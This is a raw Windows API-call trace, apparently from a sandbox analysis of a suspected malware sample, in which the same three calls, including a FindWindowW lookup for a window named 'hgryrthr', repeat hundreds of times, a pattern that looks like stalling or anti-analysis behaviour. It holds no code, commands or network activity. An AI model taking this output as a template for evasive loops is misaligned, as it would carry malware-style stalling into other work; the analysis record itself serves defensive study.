[0163.545] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.545] GetACP () returned 0x4e4 [0163.545] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.545] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.545] GetACP () returned 0x4e4 [0163.546] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.546] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.546] GetACP () returned 0x4e4 [0163.546] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.546] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.546] GetACP () returned 0x4e4 [0163.546] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.546] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.546] GetACP () returned 0x4e4 [0163.546] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.546] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.546] GetACP () returned 0x4e4 [0163.546] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.546] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.546] GetACP () returned 0x4e4 [0163.546] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.546] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.546] GetACP () returned 0x4e4 [0163.546] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.546] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.546] GetACP () returned 0x4e4 [0163.546] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.546] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.546] GetACP () returned 0x4e4 [0163.546] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.546] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.546] GetACP () returned 0x4e4 [0163.546] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.546] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.546] GetACP () returned 0x4e4 [0163.546] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.547] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.547] GetACP () returned 0x4e4 [0163.547] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.547] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.547] GetACP () returned 0x4e4 [0163.547] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.547] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.547] GetACP () returned 0x4e4 [0163.547] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.547] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.547] GetACP () returned 0x4e4 [0163.547] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.547] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.547] GetACP () returned 0x4e4 [0163.547] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.547] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.547] GetACP () returned 0x4e4 [0163.547] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.547] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.547] GetACP () returned 0x4e4 [0163.547] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.547] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.547] GetACP () returned 0x4e4 [0163.547] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.547] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.547] GetACP () returned 0x4e4 [0163.547] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.547] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.547] GetACP () returned 0x4e4 [0163.547] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.547] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.547] GetACP () returned 0x4e4 [0163.547] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.547] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.547] GetACP () returned 0x4e4 [0163.547] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.547] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.548] GetACP () returned 0x4e4 [0163.548] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.548] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.548] GetACP () returned 0x4e4 [0163.548] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.548] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.548] GetACP () returned 0x4e4 [0163.548] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.548] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.548] GetACP () returned 0x4e4 [0163.548] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.548] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.548] GetACP () returned 0x4e4 [0163.548] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.548] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.548] GetACP () returned 0x4e4 [0163.548] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.548] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.548] GetACP () returned 0x4e4 [0163.548] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.548] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.548] GetACP () returned 0x4e4 [0163.548] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.548] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.548] GetACP () returned 0x4e4 [0163.548] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.548] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.548] GetACP () returned 0x4e4 [0163.548] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.548] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.549] GetACP () returned 0x4e4 [0163.549] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.549] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.549] GetACP () returned 0x4e4 [0163.549] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.549] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.549] GetACP () returned 0x4e4 [0163.549] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.549] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.549] GetACP () returned 0x4e4 [0163.549] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.549] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.549] GetACP () returned 0x4e4 [0163.549] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.549] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.549] GetACP () returned 0x4e4 [0163.549] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.549] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.549] GetACP () returned 0x4e4 [0163.549] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.549] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.549] GetACP () returned 0x4e4 [0163.549] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.549] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.549] GetACP () returned 0x4e4 [0163.549] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.549] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.549] GetACP () returned 0x4e4 [0163.549] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.549] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.549] GetACP () returned 0x4e4 [0163.549] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.549] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.549] GetACP () returned 0x4e4 [0163.549] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.549] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.549] GetACP () returned 0x4e4 [0163.550] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.550] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.550] GetACP () returned 0x4e4 [0163.550] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.550] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.550] GetACP () returned 0x4e4 [0163.550] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.550] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.550] GetACP () returned 0x4e4 [0163.550] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.550] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.550] GetACP () returned 0x4e4 [0163.550] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.550] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.550] GetACP () returned 0x4e4 [0163.550] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.550] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.550] GetACP () returned 0x4e4 [0163.550] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.550] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.550] GetACP () returned 0x4e4 [0163.550] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.550] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.550] GetACP () returned 0x4e4 [0163.550] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.550] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.550] GetACP () returned 0x4e4 [0163.550] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.550] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.550] GetACP () returned 0x4e4 [0163.550] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.550] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.550] GetACP () returned 0x4e4 [0163.550] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.550] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.550] GetACP () returned 0x4e4 [0163.550] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.550] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.551] GetACP () returned 0x4e4 [0163.551] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.551] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.551] GetACP () returned 0x4e4 [0163.551] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.551] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.551] GetACP () returned 0x4e4 [0163.551] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.551] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.551] GetACP () returned 0x4e4 [0163.551] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.551] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.551] GetACP () returned 0x4e4 [0163.551] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.551] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.551] GetACP () returned 0x4e4 [0163.551] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.551] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.551] GetACP () returned 0x4e4 [0163.551] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.551] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.551] GetACP () returned 0x4e4 [0163.551] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.551] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.551] GetACP () returned 0x4e4 [0163.551] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.551] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.551] GetACP () returned 0x4e4 [0163.551] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.551] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.551] GetACP () returned 0x4e4 [0163.551] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.551] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.551] GetACP () returned 0x4e4 [0163.551] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.551] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.551] GetACP () returned 0x4e4 [0163.552] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.552] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.552] GetACP () returned 0x4e4 [0163.552] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.552] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.552] GetACP () returned 0x4e4 [0163.552] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.552] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.552] GetACP () returned 0x4e4 [0163.552] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.552] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.552] GetACP () returned 0x4e4 [0163.552] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.552] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.552] GetACP () returned 0x4e4 [0163.552] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.552] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.552] GetACP () returned 0x4e4 [0163.552] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.552] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.552] GetACP () returned 0x4e4 [0163.552] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.552] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.552] GetACP () returned 0x4e4 [0163.552] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.552] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.552] GetACP () returned 0x4e4 [0163.552] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.552] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.552] GetACP () returned 0x4e4 [0163.552] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.552] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.552] GetACP () returned 0x4e4 [0163.552] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.552] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.552] GetACP () returned 0x4e4 [0163.552] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.553] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.553] GetACP () returned 0x4e4 [0163.553] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.553] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.553] GetACP () returned 0x4e4 [0163.553] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.553] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.553] GetACP () returned 0x4e4 [0163.553] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.553] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.553] GetACP () returned 0x4e4 [0163.553] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.553] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.553] GetACP () returned 0x4e4 [0163.553] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.553] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.553] GetACP () returned 0x4e4 [0163.553] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.553] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.553] GetACP () returned 0x4e4 [0163.553] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.553] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.553] GetACP () returned 0x4e4 [0163.553] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.553] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.553] GetACP () returned 0x4e4 [0163.553] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.553] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.553] GetACP () returned 0x4e4 [0163.553] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.553] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.553] GetACP () returned 0x4e4 [0163.553] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.553] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.553] GetACP () returned 0x4e4 [0163.553] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.554] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.554] GetACP () returned 0x4e4 [0163.554] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.554] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.554] GetACP () returned 0x4e4 [0163.554] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.554] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.554] GetACP () returned 0x4e4 [0163.554] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.554] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.554] GetACP () returned 0x4e4 [0163.554] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.554] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.554] GetACP () returned 0x4e4 [0163.554] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.554] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.554] GetACP () returned 0x4e4 [0163.554] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.554] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.554] GetACP () returned 0x4e4 [0163.554] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.554] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.554] GetACP () returned 0x4e4 [0163.554] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.554] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.554] GetACP () returned 0x4e4 [0163.554] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.554] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.554] GetACP () returned 0x4e4 [0163.554] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.554] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.554] GetACP () returned 0x4e4 [0163.554] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.554] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.554] GetACP () returned 0x4e4 [0163.554] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.554] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.555] GetACP () returned 0x4e4 [0163.555] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.555] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.555] GetACP () returned 0x4e4 [0163.555] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.555] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.555] GetACP () returned 0x4e4 [0163.555] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.555] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.555] GetACP () returned 0x4e4 [0163.555] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.555] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.555] GetACP () returned 0x4e4 [0163.555] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.555] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.555] GetACP () returned 0x4e4 [0163.555] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.555] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.555] GetACP () returned 0x4e4 [0163.555] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.555] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.555] GetACP () returned 0x4e4 [0163.555] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.555] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.555] GetACP () returned 0x4e4 [0163.555] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.555] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.555] GetACP () returned 0x4e4 [0163.555] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.555] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.555] GetACP () returned 0x4e4 [0163.555] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.555] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.555] GetACP () returned 0x4e4 [0163.555] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.555] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.555] GetACP () returned 0x4e4 [0163.556] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.556] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.556] GetACP () returned 0x4e4 [0163.556] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.556] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.556] GetACP () returned 0x4e4 [0163.556] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.556] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.556] GetACP () returned 0x4e4 [0163.556] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.556] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.556] GetACP () returned 0x4e4 [0163.556] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 [0163.556] GenerateConsoleCtrlEvent (dwCtrlEvent=0x0, dwProcessGroupId=0x0) returned 0 [0163.556] GetACP () returned 0x4e4 [0163.556] FindWindowW (lpClassName=0x0, lpWindowName="hgryrthr") returned 0x0 